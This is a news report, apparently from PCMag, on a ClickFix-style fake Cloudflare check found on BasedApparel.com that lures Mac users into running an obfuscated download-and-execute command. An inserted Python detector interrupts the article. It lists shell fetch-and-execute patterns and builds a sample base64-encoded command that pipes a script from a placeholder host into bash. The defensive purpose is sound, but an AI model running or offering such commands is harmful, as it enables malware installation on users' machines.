
FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack

Why This Matters

This incident highlights the growing sophistication of cyberattacks targeting seemingly legitimate websites, emphasizing the importance of vigilance for both consumers and the tech industry. It underscores the need for robust security measures and user awareness to prevent malware infections through social engineering tactics embedded in trusted online platforms.

Key Takeaways

An apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware.

The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers.

The attack appears to trigger when a user visits BasedApparel.com: the victim is shown a page pretending to come from Cloudflare, the service that powers “Verify you are human” CAPTCHA checks and provides DDoS protection.


The fake Cloudflare page shows a warning saying “Unusual Web Traffic Detected” and requires the user to verify that they’re human. But to do so, the page displays unusual instructions that tell the user to open Terminal, the built-in macOS utility for running commands.


The user is then told to click the “Copy” button on the page to copy the command “I am not a robot: Cloudflare Verification ID: 801470.” In reality, clicking the button copies a much longer obfuscated string that looks like gibberish but is actually a hidden command.

The actual copied command when you click the copy button. (PCMag)

The user is then told to paste and run the command in Terminal, executing the instructions without realizing the danger. The hidden command decodes itself and then fetches a shell script containing further commands from an attacker-controlled web domain.
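The copy-then-paste-into-Terminal chain described above is what a defender can look for: a clipboard or shell-history monitor can flag a command that contains a decode step (base64, hex) together with a fetch-and-execute step (curl or wget piped into a shell) before the user runs it. The following Python script is an added example and is not code from the article or from PCMag; the detection patterns, the score threshold and the sample commands are all constructed here for illustration, and the "payload.example" hostname in the sample is a placeholder, not the domain from the incident.

```python
"""Heuristic detector for ClickFix-style "paste this into Terminal" commands.

Added example (not from the PCMag article). Scores a command string the way a
clipboard monitor, shell-history audit or EDR rule might, looking for the
decode-then-fetch-and-execute shape the article describes. All sample commands
and patterns below are constructed for illustration.
"""
import base64
import re

# Indicators of a decode/deobfuscation step in the command.
DECODE_PATTERNS = [
    r"base64\s+(-d|--decode|-D)",          # base64 decode (GNU or macOS flag)
    r"echo\s+[A-Za-z0-9+/=]{40,}",         # echo of a long base64-looking blob
    r"\bxxd\s+-r",                         # hex -> bytes
    r"printf\s+['\"](\\x[0-9a-f]{2}){8,}", # long \x-escaped byte string
]

# Indicators that fetched or decoded content is handed to an interpreter.
FETCH_EXEC_PATTERNS = [
    r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b",   # download piped straight into a shell
    r"\b(curl|wget)\b[^|]*\|\s*python",        # download piped into python
    r"\|\s*(ba|z)?sh\b",                       # anything piped into a shell
    r"\beval\b\s*[\"$(]",                      # eval of a computed string
    r"\b(ba|z)?sh\s+-c\s+['\"]",               # sh -c "<string>"
    r"\bosascript\b",                          # macOS AppleScript execution
    r"\bnohup\b",                              # detach from the terminal
]

# Social-engineering theme that has no business inside a shell command.
CAPTCHA_THEME = re.compile(r"(verification|verify|captcha|not a robot|cloudflare)", re.I)


def _decoded_fragments(cmd):
    """Return the plaintext of any base64 blobs embedded in the command.

    Lets the scorer see one layer beneath the obfuscation without running it.
    """
    out = []
    for blob in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out.append(text)
    return out


def score_command(cmd):
    """Return (score, reasons). Each matched indicator adds one point."""
    reasons = []
    layers = [("outer", cmd)] + [("decoded", t) for t in _decoded_fragments(cmd)]
    for layer, text in layers:
        for pat in DECODE_PATTERNS:
            if re.search(pat, text):
                reasons.append(f"{layer}: decode step ({pat})")
        for pat in FETCH_EXEC_PATTERNS:
            if re.search(pat, text):
                reasons.append(f"{layer}: fetch/exec ({pat})")
    if CAPTCHA_THEME.search(cmd):
        reasons.append("outer: CAPTCHA-themed text inside a shell command")
    return len(reasons), reasons


def is_clickfix(cmd, threshold=2):
    """A lone decode or a lone pipe is common in legitimate use; require two signals."""
    return score_command(cmd)[0] >= threshold


# Constructed samples. The hidden payload is built here from a harmless
# placeholder URL so the outer command has the real shape: blob -> decode -> shell.
SAMPLE_DECODED = "curl -fsSL https://payload.example/x.sh | sh"
SAMPLE_CLICKFIX = (
    "echo " + base64.b64encode(SAMPLE_DECODED.encode()).decode() + " | base64 -d | bash"
)
SAMPLE_BENIGN = [
    "ls -la ~/Downloads",
    "git clone https://github.example/repo.git",
    "base64 -d secret.b64 > out.bin",  # one decode indicator, no execution
]

if __name__ == "__main__":
    for cmd in SAMPLE_BENIGN + [SAMPLE_CLICKFIX]:
        score, why = score_command(cmd)
        print(f"{'FLAG' if is_clickfix(cmd) else 'ok  '} score={score} :: {cmd[:60]}")
        for r in why:
            print("      -", r)
```

The threshold of two signals is deliberate: a single `base64 -d` or a single pipe into `sh` appears in ordinary administration, but the combination of an inline decode step with an immediate hand-off to a shell is the ClickFix shape and is rare in hand-typed commands. On macOS this check fits naturally in a shell wrapper or a clipboard-watching agent that warns before Terminal runs the pasted text.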

PCMag encountered the attack while browsing BasedApparel.com on a MacBook, although we were only able to trigger the fake Cloudflare page once, in the Chrome browser.
